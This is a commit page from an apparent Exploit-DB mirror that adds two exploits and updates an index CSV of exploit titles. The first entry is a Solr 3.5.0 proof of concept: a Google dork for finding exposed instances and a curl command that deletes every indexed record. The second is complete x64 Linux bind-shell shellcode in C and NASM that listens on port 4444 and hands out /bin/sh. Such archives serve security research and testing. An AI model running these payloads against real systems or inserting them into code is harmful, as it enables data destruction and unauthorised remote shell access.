bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-02-15

Browse source 
2 new exploits
This commit is contained in:
Offensive Security 2016-02-15 05:04:08 +00:00
parent a9d446b65b
commit 6e68aad606
3 changed files with 190 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
files.csv
View file

@ -35405,6 +35405,7 @@ id,file,description,date,author,platform,type,port
39225,platforms/hardware/dos/39225.txt,"Apple watchOS 2 - Crash PoC",2016-01-12,"Mohammad Reza Espargham",hardware,dos,0
39226,platforms/windows/dos/39226.py,"SNScan 1.05 - Scan Hostname/IP Field Buffer Overflow Crash PoC",2016-01-12,"Daniel Velazquez",windows,dos,0
39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0
39149,platforms/lin_x86-64/shellcode/39149.c,"x64 Linux Bind TCP Port Shellcode",2016-01-01,Scorpion_,lin_x86-64,shellcode,0
39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0
39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
39152,platforms/linux/shellcode/39152..c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
@ -35659,6 +35660,7 @@ id,file,description,date,author,platform,type,port
39415,platforms/php/webapps/39415.txt,"ATutor 2.2 - Multiple XSS Vulnerabilities",2016-02-04,"Curesec Research Team",php,webapps,80
39416,platforms/php/webapps/39416.txt,"Symphony CMS 2.6.3 Multiple SQL Injection Vulnerabilities",2016-02-04,"Sachin Wagh",php,webapps,80
39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0
39418,platforms/java/webapps/39418.txt,"Solr 3.5.0 - Arbitrary Data Deletion",2016-02-08,N37,java,webapps,0
39419,platforms/multiple/webapps/39419.txt,"dotDefender Firewall 5.00.12865 / 5.13-13282 - CSRF Vulnerability",2016-02-08,hyp3rlinx,multiple,webapps,0
39420,platforms/php/webapps/39420.txt,"WordPress User Meta Manager Plugin 3.4.6 - Information Disclosure",2016-02-08,"Panagiotis Vagenas",php,webapps,80
39421,platforms/php/webapps/39421.py,"WordPress WooCommerce Store Toolkit Plugin 1.5.5 - Privilege Escalation",2016-02-08,"Panagiotis Vagenas",php,webapps,80

Can't render this file because it is too large.

29
platforms/java/webapps/39418.txt Executable file
View file

@ -0,0 +1,29 @@
# Exploit Title: All Solr Data Can Be Delete
# Google Dork: intext:[Schema] [Config] [Analysis] [Schema Browser]
[Statistics] [Info] [Distribution] [Ping] [Logging]
# Date: 5/2/2016
# Exploit Author: N37 [Myanmar]
# Vendor Homepage: http://lucene.apache.org/solr/
# Software Link: https://archive.apache.org/dist/lucene/solr/3.5.0/
# Version: 3.5.0
# Tested on: fedora 23
Solr is open source enterprise search platform built on Apache Lucene.
It can be delete all data in solr. solr are use nlp, money of data research, data mining, some of mobile backend on vps .
POC or Eg.
This Query is shwo all data in solr :
http://server:8080/solr/lambeth_planning/select/?q=*%3A*&version=2.2&start=0&rows=10&indent=on
You can delete all data with curl in terminal :
curl -X GET "server:8080/solr/lambeth_locations/update?stream.body=<delete><query>*:*<%2Fquery><%2Fdelete>&commit=true"
now you can check with first query in browser. All data are deleted.
Regards,
N37 [Myanmar]

159
platforms/lin_x86-64/shellcode/39149.c Executable file
View file

@ -0,0 +1,159 @@
/*---------------------------------------------------------------------------------------------------------------------
* /*
* Author: Scorpion
* Copyright: (c) 2016 iQube. (http://iQube.io)
* Release Date: January 1, 2016
*
* Description: x64 Linux null-free TCP bind port shellcode
* Assembled Size: 103 bytes
* Tested On: Ubuntu 14.04 LTS
*
* Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
* ./bindshell
* nc localhost 4444
*
*/
/*
* NOTE: This C code binds on port 4444
* The end of this file contains the .nasm source code
* The Port can be Reconfigured According to your needs
* Instructions for changing port number
* Port obtainer change the port value accorddingly
* port.py
* import socket
* port = 444
* hex(socket.htons(port))
* python port.py
* Result : 0x5c11
* Replace the obtained value in the shellcode to change the port number
* For building the from .nasm source use
* nasm -felf64 filename.nasm -o filename.o
* ld filename.o -o filename
* To inspect for nulls
* objdump -M intel -D filename.o
global _start
_start:
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41
xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
xor rsi, rsi
mul rsi
push byte 0x2 ;pusing argument to the stack
pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
inc esi ; already rsi is 0 so incrementing the rsi register will make it 1
push byte 0x29 ; pushing the syscall number into the rax by using stack
pop rax
syscall
; copying the socket descripter from rax to rdi register so that we can use it further
xchg rax, rdi
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)
; setting up the data sctructure
push 0x2 ;AF_INET value is 2 so we are pushing 0x2
mov word [rsp + 2],0x5c11 ;port 4444 htons hex value is 0x5c11 port values can be be obtained by following above instructions
push rsp ; saving the complete argument to rsi register
pop rsi
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; syscall number 49
push rdx ; Inserting the null to the stack
push byte 0x10
pop rdx ; value of the rdx register is set to 16 size sockaddr
push byte 0x31
pop rax ; rax register is set with 49 syscall for bind
syscall
;listen the sockets for the incomming connections
; listen(sock, MAX_CLIENTS)
; syscall number 50
pop rsi
push 0x32
pop rax ; rax register is set to 50 syscall for listen
syscall
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
;syscall number 43
push 0x2b
pop rax ; rax register is set to 43 syscall for accept
syscall
; storing the client socket description
mov r9, rax
; close parent
push 0x3
pop rax ; closing the parent socket connection using close parent rax is set to 3 syscall to close parent
syscall
xchg rdi , r9
xor rsi , rsi
; initilization of dup2
push 0x3
pop rsi ; setting argument to 3
duplicate:
dec esi
mov al, 0x21 ;duplicate syscall applied to error,output and input using loop
syscall
jne duplicate
execve: ; Execve format , execve("/bin/sh", 0 , 0)
xor rsi , rsi
mul rsi ; zeroed rax , rdx register
push ax ; terminate string with null
mov rbx , 0x68732f2f6e69622f ; "/bin//sh" in reverse order
push rbx
push rsp
pop rdi ; set RDI
push byte 0x3b ; execve syscall number (59)
pop rax
syscall
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02"
//Port number this value can be obtained from the above instructions
"\x11\x5c"
"\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}